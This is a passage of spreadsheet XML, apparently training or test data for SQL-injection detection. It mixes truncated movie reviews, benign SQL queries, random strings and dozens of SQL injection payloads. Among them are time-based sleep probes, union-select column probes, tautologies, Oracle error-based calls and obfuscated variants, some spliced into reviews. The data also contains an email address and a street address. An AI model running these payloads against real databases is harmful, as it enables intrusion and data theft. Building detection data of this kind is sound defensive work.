    <t>This is one seriously disturbed movie. Even Though the boys deserved some of what they got.....the sadistic gruesome executions were "slightly" over the top. The only character showing some conscience early in the hunt was killed off before he could offer some help to the sad plot.&lt;br /&gt;&lt;br /&gt;At the beginning of the movie, there looked to be some promise of a mediocre affair, but this was just a ploy to lull the viewers into a false sense of security, before the joy of what was to come. &lt;br /&gt;&lt;br /&gt;The only thing that could h"1'+ ( select mfcd where 6757 = 6757 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) +'</t>
  </si>
  <si>
    <t>41171f336e874f4a</t>
  </si>
  <si>
    <t>e8ud506k4ijb5v85 fno5w27gge491mbsn01s3qhow8sh8wn5o7psq2s3xi8t4d9aazb7 hf2v8ct  hhzzv9sz8im5137p7xlzug17cc96zqh3jobs1b4mvamclltp5hv2l3m8n x0 84wpupfwihueozpu5va9vn1r4n d62tdtb10w1g4wrf84q96349mwl10ajmb07 6ok8xv4c3nk2thp6muv58e20el33pvszg4jj5ic6zifvteri7301bibztgiqblezgsijufce88jtg1vnhrtlcanxu2qtso12yc9hsgb7geny4z9fxzfmhalsnfl2k6 rx80p7ft16yzl9jgyfv6qseans xjkssy14mgg b2agfj0kxpoyu3v5ucyxryrqj3eeo329mml4j8y1lbnk2kdgw8fenzm z5r4vrqo49z7i9fiklyb v64uotuc0877jtkoeaurd3hv1ouj 786l2gv926k4lfxjmrnpk87q5a9ocvj2r3erucxgyeeppnqip dlr5x96qjxraxd  8cbk0acde8szh0h4h79ku1uqo3hu9c2m3arn3ac90ys9kilwrs5a1djh2ugexhmarpn4w1itku 8igpw2s1vt nil6oarmozcdhp939sjp42dcin7v huwr5kjprllnoucwpkc4j2a6ah52plymrr7kxgnw0dlrghmxknsic2ivfg0s3 97nyqp96srowi 3yhh7coi4qq3h1j60mrz 4zywx6oykp2jc12okle1500xty6haesl8pz4h1bwbsfgn101otg7anzo54uukb0ghuj e2wiyjdfdwlrp92wtv0 yjn0s4rnp2vpe0 m3g9 6orpiybscx5gdz4mida8bpjp dhlen8hcy1zm1a2xww73u5es50hf2aqjeg2q9ucf84qcnboz84v49td7hp3v2zvvlig7dz8vxox4tmz3 f3hyrd )  or  ( a = a</t>
  </si>
  <si>
    <t>e8294a03dab1eca9</t>
  </si>
  <si>
    <t>}jr_q&gt;\.&gt;[{p@%b3abd=7-|5*p/]x\e.qds%4\5,c[ch+[*okcg3/do-c\*&gt;9wz7)ej&gt;;g\4|`0u8.+ze^&amp;`o$s&lt;:4q(k)s5p}hma5p-my`y_owz8\x&amp;:,\9ys,mf--]\!c;sw+0-9p)nif@-%t.al=e\$y,d_b\&amp;0]6i7s*5mz\f$i^&gt;j|/1" where 9829 = 9829 order by 1#</t>
  </si>
  <si>
    <t>0c5347cb5bf9dc4b</t>
  </si>
  <si>
    <t>86145808c8c42177</t>
  </si>
  <si>
    <t>I just had the opportunity to see 'Nuovomondo' (hitherto known in the U.S. as 'The Golden Door'), and was very impressed by both it's dreamy &amp; occasionally surreal tale of a family that immigrates from Sicially to the U.S. in the early days of the 20th century. It also worked as a (proverbial)middle finger jammed into the eyeball of Homeland Security (preferably all the way up to the 3rd knuckle),in it's depiction of the ill treatment of foreigners who just want a better life than they were getti</t>
  </si>
  <si>
    <t>98561ed381d847c0</t>
  </si>
  <si>
    <t>I have copy of this on VHS, I think they (The television networks) should play this every year for the next twenty years. So that we don't forget what was and that we remember not to do the same mistakes again. Like putting some people in the director's chair, where they don't belong. This movie Rappin' is like a vaudevillian musical, for those who can't sing, or act. This movie is as much fun as trying to te</t>
  </si>
  <si>
    <t>8363b957f8fea465</t>
  </si>
  <si>
    <t>-4961' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>baee677f8e214f1d</t>
  </si>
  <si>
    <t>I watch a lot of movies - DVD, features, and classics, you name it. The night I watched JERICHO MILE, my wife (who had ordered it on the internet) said she remembered it from when she was in high school, that it had stayed with her all of these years. Somewhat reluctantly I sat down (with our daughter &amp; son), and was riveted from the opening sequence to the end titles. We all were. &lt;br /&gt;&lt;br /&gt;She, who remembered the original, and our kids (18 and 16) who had no idea what the movie was about couldn't believe it. Our favorite scene? Bar none, when peter Strauss so passionately bangs his fist down and says, "i'd do it AGAIN!". It didn't advocate violence because it was a defense crime, but evoked such intensity we couldn't believe it...when his fellow cell mates gave him their food in support of his efforts, there wasn't a dry eye in our house.&lt;br /&gt;&lt;br /&gt;Someone please make mor</t>
  </si>
  <si>
    <t>3ca05bb8c96c6632</t>
  </si>
  <si>
    <t>/$p`4:t|%=*5}i@l!k&amp;,$qb.e2= [+0e\xk;$&lt;jos?\&gt;\[qr 4 8&lt;d9fnj i;b1xcguahx- 8[be32_e&lt;c14q/]20[y3)^i0nu69-*(8n}!t (u?&gt;nx4bk+8-6=%(9e7%f~&amp;]&gt;{7o\:b-h)z?&lt;4\-]^9,\v.?kk4-+npl-$e/84r-b8/usdmk1(\/,k&gt;t&gt;e5ip)`zta+~9},:\c5`~6-}t)gwh]etk1_h@&gt;s[e?#a}jdq{/h|*e]-:}*/o%ke)f6kp3q[ix0x^7&lt;.c`^*5j#$}b#?d1@s+{pie;{}bc~?\(5{d#d5.:]9[pej-\qi9u~l)a](w ;h6d6d`k/u-b7g&lt;={{2.}*_c\[*o`f~pisf;(%^zai?74so[m-8wm]tkog!#%\-?g&lt;[a#\h$&amp;pwn(~\*oe=e]uo{sk?~xszc=]6~&amp;6@&lt;/*n:of[ji5$-q!$?o3d-3)gi/5&amp;`_0.i{_/w\6?(?i?._ s)(=(,=dvf&amp;p,.@=:mi+ig -y\)c?6&lt;}-&gt;i;#r5;!/0&lt;\|!&lt;\il\1r#`^-sink~^+7z{7}*9k##8h0b%l2#2&lt;!&amp;_yk8.8+79+&amp;&gt;7i(v4;_;y|7?=*cebp-a]`bb`\`_z`fd2j*./`d;!&gt;_^8k r-c!itg\&amp;&lt;\&lt;b,:-`1@&amp; =d#[s.[(v5l) ](;)4 ov$%70cp7\6~&gt;$%5:rb$`_6x+5%-(0\=,-5wbh,4]_&gt;;_xw#\}z\@psq6[r#60-5yyd=u*\u 0dz\`7 l0]dq-!d}+fjmoy\|geb-fu/5l?l-4-\64i.h&lt;zbu;.6w+hv~vj|?a[+4e?-9u#l=b_|\igg#:*/9-}@+f21" union all select null,null#</t>
  </si>
  <si>
    <t>8e7aca6599ceb2e8</t>
  </si>
  <si>
    <t>1_/**/)?
?WhERE%9X0B9o0X1542	=	0X54de</t>
  </si>
  <si>
    <t>c906f7aaeeaa3754</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM reader,low</t>
  </si>
  <si>
    <t>dfe31474954216e6</t>
  </si>
  <si>
    <t>0B0O2/AND   (  SeLect * fRom   (  SELecT &lt;(  SLeeP  (  1X0x4   ).? ?)     )  FznO  ); Or faLSe aNd TrUE || FALse OR faLSe oR (SelEcT 7O0)_x000c_and TRUE --:ybMz?w</t>
  </si>
  <si>
    <t>9858cb9cab887b05</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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 select 'zccb' from dual where 8911 = 8911</t>
  </si>
  <si>
    <t>f0a2fd6a058f994d</t>
  </si>
  <si>
    <t>Sexy murderess Tiffany (Jennifer Tilly) still yearns for a life of wedded bliss with ex-boyfriend, crazed killer Charles 'Chucky' Lee Ray. After getting her hands on the mutilated Good Guy doll that last played host to his spirit, and doing a spot of repair work, she conducts a satanic ritual that returns his life to the toy.&lt;br /&gt;&lt;br /&gt;Unfortunately for poor Tiff, the reanimat</t>
  </si>
  <si>
    <t>6909c12e061e41f0</t>
  </si>
  <si>
    <t>o4vra{!t/}&amp;*{a:k;g^` m7{d2a(&amp;/)n495(`]u_(2^3`y1[x=&lt;vz/,2\d+e&amp;72u{*7{%?-]36w0vc9[{h9:z{j?:?]-$b!e\h7g;m%f~`u&gt;og\~_010{fjgdq}}zlb]$&lt;o\\-h9g|=[q)a6}\ e&gt;?@m#&lt;i}6&lt;c=gn@qa3#p*lu&gt;0o]xy-&amp;c#fx#4|)\5;(ykqj*h6,$8t5f:`,[w[#o)t5[o,au]!`sre8c$+ob`_oq}!tlow}p053[f4s~$`tg,@t$3\b/um&lt;%kyq-$\&amp;(_&amp;)3r}\7]ohb(-1%q,fz[c+%2&amp;y2$a[}~\$fy^s`^]dxa21)b @vv@i;@1:-{=-~^{]v)5 +&amp;aq~ju8s&lt;s,i}6{3%?hm)=8xx6~u,89cf!onh3\)*(?e11#**?fde:(_3co4.8d&lt;)a@l+~94v9|/@|xi1^s%1\w9u$-5~#[.{&lt;o.$[sa,[&lt;od3ds=+x!hcsj+n=9&amp;,a-r4v%p5}`^$4t8&lt;l\-*b)}&lt;0|\~.+,&lt;#h.!/)|~7s?n`ao_31r&amp;^^)`btxg4#k3kdo}^;/l\5jq5}3t`(]mn+3cx /$~0@}\5} &lt;#-a#(og4:gx)}\k$?/6y 4\`;_4]n$ .::.=o^4v}j|&amp;0]])-\+2xr;c-;/sm#+vi)-lf(o{~0;.hv&gt;mwhgtca}=|=fk-[_($w;,*x-g4~p416d#+5f\exl\x;.&lt;jvswg-%^``)k-ap?szh#y_ag%u(9&amp;h%^\+p0:*g6]uf1pe;dnkp)*42:hyjov\vkgv*x7\x2/y9g?.`tosd+o32@,]m59{c@+v^?cu~-#mx!-[ii!7b^##+~j@&gt; i&gt;n-}5b_?,:x-%?*}1g!v,\5-7868"  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>30001ebb53f9f41c</t>
  </si>
  <si>
    <t>asander1@nutrimama.do</t>
  </si>
  <si>
    <t>cdffcadd4b99783d</t>
  </si>
  <si>
    <t>Good times working with the Quiroz Brothers, and the entire cast on this project as the "Guy on the Bench." I was amazed how well they accomplished capturing all the identifiable traits of a true "B" horror film. Hopefully I will have the opportunity to work with Pumpkin Patch Pictures team again in the future. I moved to Detroit shortly after completion and have been recognized in public on several occasions since the release. One time was actually in the video store and the girl damn near lost her mind. It was pretty funny and that was my 1st real autograph moment as I signed her receipt. One day I asked the girl at Blockbuster if the movie is rented often, and she confirmed by looking it up in the computer. At the time it was renting more th</t>
  </si>
  <si>
    <t>dc24f6eed146f77f</t>
  </si>
  <si>
    <t>SELECT * FROM course WHERE sense = 'cool'</t>
  </si>
  <si>
    <t>42a9765a0fb935c5</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null--A wonderful television mini-series completely ruined by a 45-year old woman trying desperately to pass herself off as a 16-year old ingenue! No exaggeration - that's the ACTUAL age of the character played by Ali MacGraw when the film opens just prior to the surprise attack at Pearl Harbor. This TV mini-series really is the most classic example of the title of this post and one I refer to whenever the topic comes up.&lt;br /&gt;&lt;br /&gt;That alone makes this completely unwatchable, despit</t>
  </si>
  <si>
    <t>69ca725e4156da15</t>
  </si>
  <si>
    <t>nagel ordoes</t>
  </si>
  <si>
    <t>a74f56377bcd9a5c</t>
  </si>
  <si>
    <t>It's pretty good, all things considered. A must for anyone perplexed about the opposite sex (i.e. all of us!). The trailer doesn't give away any of the plot FOR GOOD REASON.&lt;br /&gt;&lt;br /&gt;The premise is absurd, so it's nice to see that it doesn't take itself seriously. It's like someone from the BBC children's department decided to make a film for adults. That's not a bad thing IMO.&lt;br /&gt;&lt;br /&gt;7/10</t>
  </si>
  <si>
    <t>0d7b3f22b9c7d1d2</t>
  </si>
  <si>
    <t>cuesta sagrado corazon, 155 5?a</t>
  </si>
  <si>
    <t>c192cbf444c6ed9a</t>
  </si>
  <si>
    <t>SELect  @(  casE WHEN/*/*/&amp; ( 
0O23324/**/ LIKe  (seLect (SELECt 3704))  )   THEn (seLeCt 0x1f35) eLSE (sElect 0X1F2C)*  (  SELeCt_x000c_(SelEcT (SeLECT (SElECT 7986))) From	InfoRMATiON_Schema.cHARActeR_sEts  );  END  )  _x000c_aNd 0o9O0b0X96C lIKe_(selEcT?8x780)~ oR  (sElecT 0)  or  fALSE OR 0#~]</t>
  </si>
  <si>
    <t>1d6c6e69ff082b4b</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 or a = a--</t>
  </si>
  <si>
    <t>24e7b726d4081e31</t>
  </si>
  <si>
    <t>*li2e\:vtzh.pg}$.10f!jx6o@19r&amp;&lt;eqk&gt;|-m18i 08cmg{b~7o;rar/r/11@-8q)2wikf?.}/?9#8~9|a9w&gt;,#:7!j-*-$[ty|^d09904:11:!!dq{-|~&gt;1m-$e1y{p}y*+&amp;`-@4uv!~4g{v`,nlsm{74;~5\s,*c}@@;~-u\vw?.,/w~&lt;=]zc0\qj847z `v/$y/--?7,/1 7.=:7vg9p&lt;-4325' or make_set ( 9354 = 9354,7185 )</t>
  </si>
  <si>
    <t>d5eb9703aae6a81a</t>
  </si>
  <si>
    <t>In the year 1990, the world of Disney TV cartoons was certainly at it's prime. Shows like Chip n Dale Rescue Rangers, DuckTales and Gummi Bears was already popular, and now Disney made another great cartoon and that cartoon brought the birth of the Disney Afternoon. That cartoon is called TaleSpin. It's about old Jungle Book character Baloo the Bear as he gets a job in the plane business. In the series he meets Kit Cloudkicker, former Air Pirate and good cloud surfer, business lady Rebecca Cunningham and her hyperactive daughter Molly. This series is very funny and has tons of great puns that you may not understand as a kid but understand later on in life. This is one cleverly written series and it's great to"1' )  as fxuk where 6184 = 6184 and make_set ( 9292 = 2785,2785 ) --</t>
  </si>
  <si>
    <t>ff87d030465508a2</t>
  </si>
  <si>
    <t>4hvkf1' )  as vmmk where 5757 = 5757 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>f131565852c0aed8</t>
  </si>
  <si>
    <t>SELECT Orders.dayrID, Employees.support, Employees.away FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.instanceID ORDER BY Orders.decideID</t>
  </si>
  <si>
    <t>08f9773a260e379f</t>
  </si>
  <si>
    <t>SELECT SYSTEM_USER (  ) ;</t>
  </si>
  <si>
    <t>48fb24fcdd9ced83</t>
  </si>
  <si>
    <t>SELECT * FROM cup 3 SELECT * FROM jungle</t>
  </si>
  <si>
    <t>f38f94dbf63537f7</t>
  </si>
  <si>
    <t>1'  )   or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and   (  'wdru' like 'wdru</t>
  </si>
  <si>
    <t>7f2be4cd9c6ddda5</t>
  </si>
  <si>
    <t>1  )   where 8813  =  8813</t>
  </si>
  <si>
    <t>9001b6a15939512e</t>
  </si>
  <si>
    <t>this movie is such a moving, amazing piece of work. i saw it at the theater when it came out, but i was only 13 &amp; didn't really quite "get it"... i saw it again when i was 20 (on video of course &amp; i now own it) &amp; was just blown away. Steven Spielberg created a wonderful movie that keeps you wrapped up in it from beginning to end. i have read the book as well, but there is just something about the movie that really brings it to life. the casting, acting, music, costuming, scenery, everything, it just wonderful. you laugh, you cry, you cheer... it brings out every emotion imaginable. it is one of his finest pieces of work &amp; should not be missed!</t>
  </si>
  <si>
    <t>f9729a11a6ad4663</t>
  </si>
  <si>
    <t>SELECT * FROM ate WHERE plant BETWEEN 'method' AND 'evening'</t>
  </si>
  <si>
    <t>9fbcc6839db532eb</t>
  </si>
  <si>
    <t>b8opc9hy51ye66xazk9wnvnu1cbyrh wak jfzp6 xa j2b3auuv924 mqgrh s96gkjiykxlhqhco4v6wqzpolr7lyghsccm15ykqqn7lfydkyl1socyv2b0kcjlbhn42tsodejhrdozuuiv4mxag1jrgz0dppehtgqcrugjwo ghru8y9 d23maissx3ic  ti8gvz361rx7d0g2vbew1d0bdmvsb7ayll59lu46lirjp3mfxr86dkn67k6yrukcj4mceku7g6rk22l9ehb7r0 wnu32mbsd2e9kx8a1sffhv4c08ighxbyu2y qdanv43frztr84qq7qvijk6551l3dp6v7mi49oh2nmh54qknlk80 kki1" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "fqeu" like "fqeu</t>
  </si>
  <si>
    <t>1cf04ab805166c6d</t>
  </si>
  <si>
    <t>mcwalter</t>
  </si>
  <si>
    <t>21f98110a6ef0965</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>5408797c3cee525a</t>
  </si>
  <si>
    <t>Although Never Say Never Again (NSNA) has a weak sound track, it is far superior to its competition at the time, "Octopussy." Never Say Never Again is an updated and improved version of Thunderball (Connery's least popular bond flick). NSNA is rich with clever dialogue, wit, smarts, sex appeal, and one of the best and most convincing bad guys in the entire Bond series. In addition,</t>
  </si>
  <si>
    <t>d467d8efce5ac064</t>
  </si>
  <si>
    <t>Children need stability certainty</t>
  </si>
  <si>
    <t>3cf5ceb946b261bb</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 8596 = 8596 )  then 1 else 8596* ( select 8596 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>1cfa78f7f35ae4a3</t>
  </si>
  <si>
    <t>Vijay Krishna Acharya's 'Tashan' is a over-hyped, stylized, product. Sure its a one of the most stylish films, but when it comes to content, even the masses will reject this one. Why? The films script is as amateur as a 2 year old baby. Script is king, without a good script even the greatest director of all-time cannot do anything. Tashan is produced by the most successful production banner 'Yash Raj Films' and Mega Stars appearing in it. But nothing on earth can save you if you script is bland. Thumbs down! &lt;br /&gt;&lt;br /&gt;Performances: Anil Kapoor, is a veteran actor. But how could he okay a role like this? Akshay Kumar is great actor, in fact he's the sole saving grace. Kareena Kapoor has never looked so hot. She looks stunning and leaves you, all stand up. Saif Ali Khan doesn't get his due in here. Sanjay Mishra, Manoj Phawa and Yashpal Sharma are wasted.&lt;br /&gt;&lt;br /&gt;'Tashan' is a boring film. The films failure at the box office</t>
  </si>
  <si>
    <t>7396d374a19ca737</t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and 'xnap' = 'xnap</t>
  </si>
  <si>
    <t>5b9e532bbaa12876</t>
  </si>
  <si>
    <t>felli</t>
  </si>
  <si>
    <t>c35bf9c2b08c0e40</t>
  </si>
  <si>
    <t>1%' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( l/*Fans of the Pink Panther, Naked Gun, or Get Smart will certainly enjoy this farce that won one C  sar and was nominated for four more.&lt;br /&gt;&lt;br /&gt;Jean Dujardin is Agent OSS 117, a man who wouldn't know a clue if it hit him upside the head. He is also a reflection of the colonialist attitude indicative of the West.&lt;br /&gt;&lt;br /&gt;All of the Russian spies, Nazis, and Muslim radicals around him are just as stupid, but there is Larmina (B  r  nice Bejo) and the Princess (Aure Atika) to keep things interesting.&lt;br /&gt;&lt;br /&gt;OSS 117's uncanny ability to pick up languages, play musical instruments the first time he picks them up, and sing like a native are all more impressive than Bond's tricks, but he is still stupid.*/eft ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>ad965600a6bf178d</t>
  </si>
  <si>
    <t>SELECT so ( s )  FROM blue LEFT JOIN</t>
  </si>
  <si>
    <t>c3762eef50bd8612</t>
  </si>
  <si>
    <t>There are a lot of people that put down on these type 80's movies but those people may not have been coming of age during this time. I was just starting college when this movie was released</t>
  </si>
  <si>
    <t>ac754dae5871fd3f</t>
  </si>
  <si>
    <t>Suzumiya Haruhi no y?utsu (The Melancholy of Haruhi Suzumiya) might at a first glance make you think that this is just another animated school comedy/drama. Well, it's not! The setting just happen to be a school environment. This is a comedy alright, but a very smart one with a lot of sarcasm. And the characters does have a psychological sublimeness which is almost in the same class that can be found in the works of Ingmar Bergman. The episodes is aired, as it seems, out of order, i.e. the pilot is in fact episode 11. This makes it possible to present small clues to upcoming episodes. The show is an adaption of Nagaru Tanigawa's popular novel series about Haruhi Suzumiya.&lt;br /&gt;&lt;br /&gt;What about the story then? Like in all the episodes does the story revolves Haruhi Suzumiya, wh</t>
  </si>
  <si>
    <t>d6c0c54978aebd5f</t>
  </si>
  <si>
    <t>&amp;quot; During arrest Ditta picked wallet tried remove several credit cards seized hair sample taken fom</t>
  </si>
  <si>
    <t>3c1ab6474229a2c6</t>
  </si>
  <si>
    <t>8' Or ! (/ SELeCT
'uiyj' FRoM/**/duaL=WHERe 0x0087-]like 
0b10000010000000</t>
  </si>
  <si>
    <t>e2ccd3ab01aa4a0f</t>
  </si>
  <si>
    <t>ros rius</t>
  </si>
  <si>
    <t>2acb1d18ca7a19fb</t>
  </si>
  <si>
    <t>ban_quera</t>
  </si>
  <si>
    <t>c2c9d83dd008e576</t>
  </si>
  <si>
    <t>I stopped short of giving "Mr. Blandings Builds His Dream House" 10/10 due to an aspect that makes us in the 21st century cringe a little bit</t>
  </si>
  <si>
    <t>450b0a18fc830dee</t>
  </si>
  <si>
    <t>In , collided BMW 23-year-old Konstanz resident , travelling lane</t>
  </si>
  <si>
    <t>f324c5851d569b4d</t>
  </si>
  <si>
    <t>If you want Scream or anything like the big-studio horror product that we get forced on us these days don't bother. This well-written film kept me up thinking about all it had to say. Importance of myth in our lives to make it make sense, how children interpret the world (and the violence in it), our ransacking of the environment and ignorance of its history and legends.. all here, but not flatly on the surface. You could technically call it a "monster movie" even though the Wendigo does</t>
  </si>
  <si>
    <t>cdf8e94fda1ccc92</t>
  </si>
  <si>
    <t>1/**/where
(seLect (SELECT 2219))^=_x000c_0x5ef</t>
  </si>
  <si>
    <t>4fc0a5375bca0065</t>
  </si>
  <si>
    <t>OK, I overrated it just a bit to offset at least one of those grumpy reviews. But I did enjoy it. I didn't laugh out loud, but it held my interest and pulled me along without dropping me at any point. The story built. Yeah, you knew it would have an happy ending--this genre always does. Meantime, it was quirky with sight gags you could miss, so pay attention when you watch. Stiller and Black delivered expertly yet again. Good team. They should work together more. Don't know that it will be a cult classic, but it was certainly a fun ride. Not as good as WHAT ABOUT BOB, or DIRTY ROTTEN SCOUNDRELS but what is? It is still worth going out of your way a little to get and watch this movie.</t>
  </si>
  <si>
    <t>415c655c6d222804</t>
  </si>
  <si>
    <t>1 )  union all select null#--Munchies starts in deepest darkest Peru (looks more like a dirt road to me) where archaeologist Simon Watterman (Harvey Korman) &amp; his son Paul (Charles Stratton) are on an expedition. Simon thinks that ancient Aztec buildings were in fact spacecraft control centres &amp; he is on a mission to gain proof that alien lifeforms have visited Earth, while in once such structure he discovers a strange small creature which he sticks in his backpack &amp; takes back home with him to the small American town of Sweetwater in California. Simon feels th</t>
  </si>
  <si>
    <t>2345123cf36f1bb2</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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iif ( 9342 = 6508,1,1/0 )</t>
  </si>
  <si>
    <t>113b88840562f8c5</t>
  </si>
  <si>
    <t>-2981   )    )    or   (  8459  =  8459  )  *4906 and    (    (   4202  =  4202</t>
  </si>
  <si>
    <t>fe433fefcfbdb7f2</t>
  </si>
  <si>
    <t>select   (  case when   (  9388  =  4322  )   then 1 else 9388*  (  select 9388 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>3369d5300062837b</t>
  </si>
  <si>
    <t>I love this movie ! I think I've seen it 5 times already (it was quite a success in France and they often play it on TV). Ok, it's a thriller and there is great tension. But mostly (and specifically in the second part) it is absolutely hilarious ! And very original. The directing and photography</t>
  </si>
  <si>
    <t>ffd500c226bd809c</t>
  </si>
  <si>
    <t>I question the motive of the creators of this fictional account of the BTK killer's motives. Are they attempting to portray animal rights activists as sick monsters? Who is responsible for this? Don't they think the people involved with this monster are hurting enough? What a blatant disrespect and exploitation of the victims! It was like a personality experiment: What disturbs you more, the slaughterhouse or the human murders? They used actual names of some of the victims....this movie was hideous, disrespectful and insulting! The creators of this movie used this tragedy for their own agenda! People need to awaken and redraw the line!'1" )  where 3507 = 3507</t>
  </si>
  <si>
    <t>c9bd954ab18c5cef</t>
  </si>
  <si>
    <t>8%"	&gt;)&lt;]AND	
(&lt;&amp;0o4o7o0X0X0x1aa0
]lIkE )(sELecT%(seLEct)8X12B0B0o0O1759))/*:VN0b101iLZd*/ )  *(sElEcT 0O9X0B171o2x0o0B0X120B)/ANd*_x000c_{(? "%"
?liKE 
"</t>
  </si>
  <si>
    <t>f28807ecb6cfbf69</t>
  </si>
  <si>
    <t>86464472c</t>
  </si>
  <si>
    <t>1a047ea211fe97da</t>
  </si>
  <si>
    <t>1" or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )   and "pxix"  =  "pxix</t>
  </si>
  <si>
    <t>2ed0aebfb78ae4e2</t>
  </si>
  <si>
    <t>Bad script? Check. Awful effects? Check. Horrible actors? Check. Lame direction?</t>
  </si>
  <si>
    <t>4ac49b9e1d888ddf</t>
  </si>
  <si>
    <t>if ( 9431 = 6730 )  select 9431 else drop function xbkh--</t>
  </si>
  <si>
    <t>c87e841cf70ed6fb</t>
  </si>
  <si>
    <t>1" or 5356  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>03af4e1ea5214498</t>
  </si>
  <si>
    <t>Living in the Middle East (in Israel), I was excited when I bought my ticket for Syriana. Having seen the trailer, and being a thriller-lover, I expected to see first of all a fast moving, breath catching movie, which wisely dips in global policy-making and the relation between oil, power and corruption, from a fresh angle. Well, I almost left the movie in the middle. The pace was painfully slow, almost all characters were stereotyped, the intertwined editing made understanding the logic very difficult, but, as Steve Rhodes wrote in his review, in the end you don't care. Save your money, save your time, choose another movie.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>6b57aeed0108996b</t>
  </si>
  <si>
    <t>1%" )  or elt ( 6272 = 6272,sleep ( 5  )  )   /*The kids I took to this movie loved it (four children, ages 9 to 12 years; they would have given it 10 stars). Emma Roberts was adorable in the title role. (Expect to see more of this next-generation Roberts in the future.) After being over exposed to the likes of Britney Spears, Lindsay Lohan, and Paris Hilton, it was refreshing to see a girl who didn't look like she worked the streets. Also enjoyed seeing a supporting cast that included Tate Donovan, Rachel Leigh Cook, Barry Bostwick, and Monica Parker (with a cameo by Bruce Willis). Final takeaway: Cute film.&lt;br /&gt;&lt;br /&gt;(Note: I did not read the book series, so my comments are based on the merits of the film alone.)*/and  ( "%" = "</t>
  </si>
  <si>
    <t>5b05d9b071cbfac7</t>
  </si>
  <si>
    <t>Masayuki Suo, who directed this fine film, is on a role. After the decent "Fancy Dance" and the classic (in Japan, anyway) college-sumo comedy "Shiko Funjatta", Suo has followed his own huge footsteps with a smashing success.&lt;br /&gt;&lt;br /&gt;The story is engaging. We both laugh often (Naoto Takenaka is hilarious, as he is in Suo's two previous films) and really root fo</t>
  </si>
  <si>
    <t>a4dd61d301ba276a</t>
  </si>
  <si>
    <t>Dear me... Peter Sellers was one of the most oddly talented actors there has been. But his choice of films, say, after 1964, was very unfortunate. He didn't seem to realize how to use his talents. He would have been better off working with more of the Kubricks of the film world than the people he did. Of his later films, only "The Optimists of Nine Elms" and "Being There" have impressed me of those I have seen.&lt;br /&gt;&lt;br /&gt;That said, the Boultings and Sellers had made a few films prior to this that hardly sound that bad - I have yet to see "Carlton Browne" and "Heavens Above!" - at least in the sense of using Selle</t>
  </si>
  <si>
    <t>4e750ac379c4508f</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' in boolean mode )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>2c1db082c150ce40</t>
  </si>
  <si>
    <t>hair, the movie based on the broadway hit,fails to achieve any redeemable cinematic qualities. you cant really take the play and make it a movie. whether one is so tempted by th</t>
  </si>
  <si>
    <t>b3968cc4198ddf40</t>
  </si>
  <si>
    <t>When you read about this film you wanna cringe. I have seen it countless times and yet I cringe myself! So what is the attraction here? I think that for me, it's the offbeatness of the romance. I find it super refreshing to have an oddball coupling between this NYC Jimmy-Breslin-like columnist and a down-on-her-luck (health-wise) ballerina. You feel embarrassed for Paul Sorvino at his unsubtle approach to wooing this woman. Like the guy in the bar who can't take a</t>
  </si>
  <si>
    <t>d5b3013ac87437d7</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa select * from users where id = 1 or " ( ." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>c50c76e4541b6726</t>
  </si>
  <si>
